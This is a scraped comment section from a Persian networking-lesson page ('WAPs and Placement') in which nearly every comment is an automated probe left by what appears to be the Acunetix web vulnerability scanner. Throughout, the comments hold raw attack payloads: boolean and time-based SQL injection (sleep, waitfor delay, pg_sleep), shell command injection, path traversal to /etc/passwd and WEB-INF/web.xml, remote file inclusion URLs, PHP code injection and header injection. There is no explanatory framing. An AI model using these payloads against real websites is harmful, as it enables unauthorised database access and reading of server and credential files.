با حمایت ما%۵
تخفیف بگیرد

logo-samandehi

آموزش شبکه14-WAPs and Placement

ارسال نظر

xuikxxpf در تاریخ: ۷ فروردین ۱۳۹۵ _ ۱۵:۴۶:۲۳نوشت:

1

atlgyuvw در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۴:۳۶:۵۴نوشت:

1

bufhfyai در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۴:۴۱:۳۴نوشت:

1

ntbpbslr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۴:۴۴:۰۵نوشت:

1

kghipgns در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۱نوشت:

1

kghipgns در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۲نوشت:

1

kghipgns در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۲نوشت:

response.write(9568861*9073166)

kghipgns در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۲نوشت:

'+response.write(9568861*9073166)+'

kghipgns در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۲نوشت:

"+response.write(9568861*9073166)+"

kghipgns در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۳نوشت:

1

kghipgns در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۳نوشت:

1

kghipgns در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۴نوشت:

1

response.write(9142444*9426265) در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۴نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۴نوشت:

1

'+response.write(9142444*9426265)+' در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۴نوشت:

1

"+response.write(9142444*9426265)+" در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۵نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۵نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۵نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۵نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۶نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۶نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۶نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۷نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۷نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۷نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۸نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۸نوشت:

set|set&set

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۹نوشت:

'set|set&set'

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۹نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۳۹نوشت:

"set|set&set"

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۰نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۰نوشت:

set|set&set

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۱نوشت:

`set|set&set`

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۱نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۱نوشت:

;set|set&set;

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۱نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۲نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۲نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۳نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۳نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۳نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۳نوشت:

1

iilwnghd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۴نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۴نوشت:

1

set|set&set در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۴نوشت:

1

'set|set&set' در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۵نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۵نوشت:

1

wlisqnnu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۵نوشت:

1

"set|set&set" در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۵نوشت:

1

wlisqnnu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۵نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۵نوشت:

1

set|set&set در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۶نوشت:

1

wlisqnnu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۶نوشت:

1

`set|set&set` در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۶نوشت:

1

wlisqnnu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۶نوشت:

SomeCustomInjectedHeader:injected_by_wvs

;set|set&set; در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۶نوشت:

1

wlisqnnu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۶نوشت:

SomeCustomInjectedHeader:injected_by_wvs

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۶نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۷نوشت:

1

wlisqnnu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۷نوشت:

SomeCustomInjectedHeader:injected_by_wvs

wlisqnnu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۸نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۸نوشت:

1

wlisqnnu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۸نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۸نوشت:

1

wlisqnnu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۸نوشت:

1

SomeCustomInjectedHeader:injected_by_wvs در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۸نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۹نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۹نوشت:

1

SomeCustomInjectedHeader:injected_by_wvs در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۹نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۹نوشت:

1

SomeCustomInjectedHeader:injected_by_wvs در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۴۹نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۰نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۰نوشت:

1

rfwsufld در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۰نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۱نوشت:

-1 OR 2+717-717-1=0+0+0+1 --

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۱نوشت:

1

rfwsufld در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۱نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۱نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۲نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۲نوشت:

-1 OR 3+717-717-1=0+0+0+1 --

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۲نوشت:

1

rfwsufld در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۲نوشت:

TicketBtn=ثبت نظر

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۳نوشت:

-1 OR 3*2<(0+5+717-717) --

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۳نوشت:

1

rfwsufld در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۴نوشت:

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۴نوشت:

-1 OR 3*2>(0+5+717-717) --

rfwsufld در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۴نوشت:

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۵نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۵نوشت:

-1 OR 2+422-422-1=0+0+0+1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۵نوشت:

1

rfwsufld در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۵نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۵نوشت:

1

udxnpucq در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۶نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۶نوشت:

-1 OR 3+422-422-1=0+0+0+1

rfwsufld در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۶نوشت:

1

udxnpucq در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۶نوشت:

${9999036+10000137}

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۶نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۶نوشت:

-1 OR 3*2<(0+5+422-422)

udxnpucq در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۶نوشت:

1

rfwsufld در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۶نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۶نوشت:

1

${10000451+9999928} در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۷نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۷نوشت:

-1 OR 3*2>(0+5+422-422)

rfwsufld در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۷نوشت:

1

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۷نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۷نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۷نوشت:

-1' OR 2+533-533-1=0+0+0+1 --

sample@email.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۸نوشت:

1

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۸نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۸نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۸نوشت:

-1' OR 3+533-533-1=0+0+0+1 --

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۸نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۸نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۸نوشت:

1

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۹نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۹نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۹نوشت:

1

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۱۹:۵۹نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۰نوشت:

-1' OR 3*2<(0+5+533-533) --

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۰نوشت:

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۰نوشت:

1

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۰نوشت:

1some_inexistent_file_with_long_name\0.jpg

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۰نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۰نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۱نوشت:

-1' OR 3*2>(0+5+533-533) --

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۱نوشت:

Http://testasp.vulnweb.com/t/fit.txt

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۱نوشت:

http://testasp.vulnweb.com/t/fit.txt?.jpg

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۱نوشت:

1

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۲نوشت:

testasp.vulnweb.com

hcytpjky در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۲نوشت:

WE41WXlaQmlYS2JBb01nMWpYYjFrWThSMnBacERmRGRFR01KQ21nZllxWklzMmJheQ==

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۲نوشت:

-1" OR 2+83-83-1=0+0+0+1 --

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۲نوشت:

1

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۲نوشت:

1

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۳نوشت:

1

rdsqcmwr در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۳نوشت:

1

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۳نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۳نوشت:

-1" OR 3+83-83-1=0+0+0+1 --

dkxvvbxg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۳نوشت:

1&n958143=v916349

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۴نوشت:

1

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۴نوشت:

1

hrysxpii در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۴نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۴نوشت:

1

hgocsrwp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۵نوشت:

1

nyscegvj&n954678=v973824 در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۵نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۵نوشت:

../../../../../../../../../../etc/passwd

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۵نوشت:

-1" OR 3*2<(0+5+83-83) --

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۵نوشت:

1

idrrurow در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۶نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۶نوشت:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name\0.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۶نوشت:

1

idrrurow در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۶نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۶نوشت:

-1" OR 3*2>(0+5+83-83) --

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۶نوشت:

../../../../../../../../../../etc/passwd\0.jpg

Http://testasp.vulnweb.com/t/fit.txt در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۶نوشت:

1

idrrurow در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۶نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۷نوشت:

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://testasp.vulnweb.com/t/fit.txt?.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۷نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۷نوشت:

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

idrrurow در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۷نوشت:

)

testasp.vulnweb.com در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۷نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۸نوشت:

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

idrrurow در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۸نوشت:

!(()&&!|*|*|

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۸نوشت:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

bnnimqin در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۸نوشت:

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۸نوشت:

1 waitfor delay '0:0:6' --

idrrurow در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۸نوشت:

^(#$!@#$)(()))******

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۸نوشت:

/../..//../..//../..//../..//../..//etc/passwd\0.jpg

bnnimqin در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۹نوشت:

'"()

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۹نوشت:

T4K05HsM'; waitfor delay '0:0:6' --

idrrurow در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۹نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۹نوشت:

.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd

bnnimqin در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۹نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۹نوشت:

90jQrWmK'); waitfor delay '0:0:6' --

idrrurow در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۹نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۰۹نوشت:

/etc/passwd

bnnimqin در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۰نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۰نوشت:

weIWV8J0')); waitfor delay '0:0:9' --

idrrurow در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۰نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۰نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۰نوشت:

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۰نوشت:

cA4CyWKT';select pg_sleep(9); --

) در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۱نوشت:

1

'"() در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۱نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۱نوشت:

KcP1v3hS');select pg_sleep(3); --

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۱نوشت:

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

!(()&&!|*|*| در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۱نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۱نوشت:

cYB41wID'));select pg_sleep(3); --

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۲نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۲نوشت:

^(#$!@#$)(()))****** در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۲نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۲نوشت:

1

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۳نوشت:

1

jvgfamds در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۳نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۳نوشت:

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۳نوشت:

1

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۳نوشت:

1

jvgfamds در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۴نوشت:

http://testasp.vulnweb.com/t/xss.html?%00.jpg

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۴نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۴نوشت:

file:///etc/passwd

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۴نوشت:

1

jvgfamds در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۴نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۵نوشت:

/\\../\\../\\../\\../\\../\\../\\../etc/passwd

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۵نوشت:

;print(md5(acunetix_wvs_security_test));

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۵نوشت:

1

http://testasp.vulnweb.com/t/xss.html?%00.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۵نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۵نوشت:

WEB-INF/web.xml

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۵نوشت:

';print(md5(acunetix_wvs_security_test));$a='

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۶نوشت:

WEB-INF\\web.xml

jkxhxqvm در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۶نوشت:

";print(md5(acunetix_wvs_security_test));$a="

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۱۶نوشت:

1

